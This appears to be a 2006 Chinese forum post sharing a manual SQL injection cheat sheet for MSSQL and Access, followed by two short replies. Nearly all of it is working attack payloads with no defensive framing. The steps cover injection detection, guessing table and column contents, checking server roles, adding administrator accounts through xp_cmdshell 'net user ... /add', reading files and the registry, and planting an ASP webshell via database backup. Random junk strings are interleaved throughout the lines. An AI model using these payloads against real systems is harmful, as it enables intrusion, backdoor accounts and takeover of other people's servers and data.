社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 4246阅读
  • 2回复

手动方式SQL注入脚本命令

级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
1.判断是否有注入;and 1=1 ;and 1=2 Ji#"PE/Pt  
  2.初步判断是否是mssql ;and user>0 JFJ_ PphvD  
0c$0<2D%  
  3.注入参数是字符'and [查询条件] and ''=' 4GiHp7Y&A  
>BDK?YMx  
  4.搜索时没过滤参数的'and [查询条件] and '%25'=' "<e<0::  
^h c&rD)_  
  5.判断数据库系统 Ny\c>$z  
cEP!DUo  
  ;and (select count(*) from sysobjects)>0 mssql "M GX(SQ  
L,m'/}$  
  ;and (select count(*) from msysobjects)>0 access 5Oa`1?C1  
>I~$h,  
WeqE 9@V  
e]1&f.K  
  6.猜数据库 ;and (select Count(*) from [数据库名])>0 }k`-n32)|  
t,YnweH  
  7.猜字段 ;and (select Count(字段名) from 数据库名)>0 $,/;QP}  
qHGwD20 ~  
  8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 9L`5r$/  
:|Ckr-k"1e  
  9.(1)猜字段的ascii值(access) (O$PJLI  
gJ; *?Uq(  
  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 xb N)z  
efc<lSUR  
  (2)猜字段的ascii值(mssql) 4/z K3%J  
C\Y%FTS:  
  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 ke+3J\;>  
H}Jdnu|ko  
  10.测试权限结构(mssql) j56#KNAha  
a5)<roWQ  
^PNE6  
(O&R-5m  
  ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--  1\[En/6  
jHU5>Gt-}  
  ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- ja<!_^h=At  
5i<E AKL  
  ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- p#]D-?CM)  
E`"<t:RzF  
  ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- c}QWa"\2n  
3:S>MFRn.3  
  ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- hS( )OY  
H}nPaw]G  
  ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- F+c4v A})  
ZFJ qI  
  ;and 1=(select IS_MEMBER('db_owner'));-- 1TOT}h5  
! H^,p$`[i  
5t,W'a_  
+1te8P*  
  11.添加mssql和系统的帐户 Q^B !^_M  
jMpV c E#  
  ;exec master.dbo.sp_addlogin username;-- D~(f7~c%  
  ;exec master.dbo.sp_password null,username,password;-- LU7ia[T  
\8KAK3i'  
  ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- + YjK#  
;cFlZGw   
  ;exec master.dbo.xp_cmdshell 'net user username password T3JM8  
2b[R^O}   
  /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- z-J?x-<  
#835 $vOe  
  ;exec master.dbo.xp_cmdshell 'net user username password /add';-- 3 7F&s  
%u)niY-g  
  ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- wWaJ%z>3y  
K [.*8  
o>#ue<Bc6  
"B$r{ vG  
  12.(1)遍历目录 =vpXYj  
,4OH9 -Q1  
  ;create table dirs(paths varchar(100), id int) ]"*sp  
(>LJv |wn  
  ;insert dirs exec master.dbo.xp_dirtree 'c:\' oZ /z{`  
/^2&@P7  
  ;and (select top 1 paths from dirs)>0 wT taj08D  
A#&,S4Wi|  
  ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) 4P>4d +  
Dh4 EP/=z  
'X$J+s}6&  
si!jB%^  
  (2)遍历目录 Qw,{"J  
mZ[tB/  
  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- 0tFR. sS?  
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 jQV.U~25Q  
5LkpfmR  
  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 cl'#nLPz;  
k;fy8  
  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 ~+HZQv3Y  
5C G ,l  
  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 ~vL`[JiK  
3SeM:OYq]s  
dw"Tv ~  
I?z*.yA*  
  13.mssql中的存储过程 GY3g`M   
ZQVr]/W^r  
  xp_regenumvalues 注册表根键, 子键 o)M=; !  
/`2t$71)  
  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 g.V{CJ*V  
TA~FP#.  
  xp_regread 根键,子键,键值名 .*x |TPv{  
(Cc!Iw'0M  
  ;exec xp_regread `1hM3N.nO  
#C`IfP./  
  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 m|c5X)}-  
Cb1fTl%  
  xp_regwrite 根键,子键, 值名, 值类型, 值 v)!C Dpw  
^&Re-{ES]  
  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 "UVqHW1%K  
=8p *Ijs  
  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 1Fs:&*=  
hE9UWa.Q>  
  xp_regdeletevalue 根键,子键,值名 QrX 5Kwq  
*=KX0%3  
  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 G|LJOq7QB  
V t[Kr  
  xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 $lC*q  
H;=JqD8`  
gE}+`w/X  
`nvm>u~[Hq  
  14.mssql的backup创建webshell &y~~Z [.F,  
&l<~Xd#  
  use model L+]|-L`S  
b14WIgjsl  
  create table cmd(str image); >X$I:M<L  
`:4bg1u  
  insert into cmd(str) values (''); k/`WfSM\.  
<jk.9$\$A  
  backup database model to disk='c:\l.asp'; 6%^9`|3  
50?5xSEM0_  
Pi!3wy  
$Rd]e C  
  15.mssql内置函数 zg[.Pws:E  
1%^d <%,]  
  ;and (select @@version)>0 获得Windows的版本号 kvoEnwBe_  
T l%n|pc  
  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa FZi'#(y  
UEb'b,O_9  
  ;and (select user_name())>0 爆当前系统的连接用户 O\5q_>]  
?04$1n:  
  ;and (select db_name())>0 得到当前连接的数据库 EYaX@|)  
L*'3f~@Q  
8YLS/dN0 w  
/5s,< 0Kz  
  16.简洁的webshell 7XDze(O5  
ZQ_&HmgRy  
  use model vrr` ^UB2  
@8$3Q,fF(  
  create table cmd(str image); (e~vrSk+)~  
;V:Cf/@@R  
  insert into cmd(str) values (''); 8va&*J? 2  
Lu6?$N57rC  
  backup database model to disk='g:\wwwtest\l.asp';
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 经院博士
发帖
3975
铜板
4727
人品值
1147
贡献值
565
交易币
0
好评度
3833
信誉值
0
金币
0
所在楼道
学一楼
只看该作者 1 发表于: 2006-08-31
学习.......... 呵呵 我是好人
引用

引用
想找我?如果我即不在 石家庄经济学院论坛www.uebbs.net,也不在宿舍,那,我肯定是在去的路上

引用
级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-08-31
这个和好人有关系吗?
描述
快速回复

您目前还是游客,请 登录注册
如果您在写长篇帖子又不马上发表,建议存为草稿
认证码:
验证问题:
3+5=?,请输入中文答案:八 正确答案:八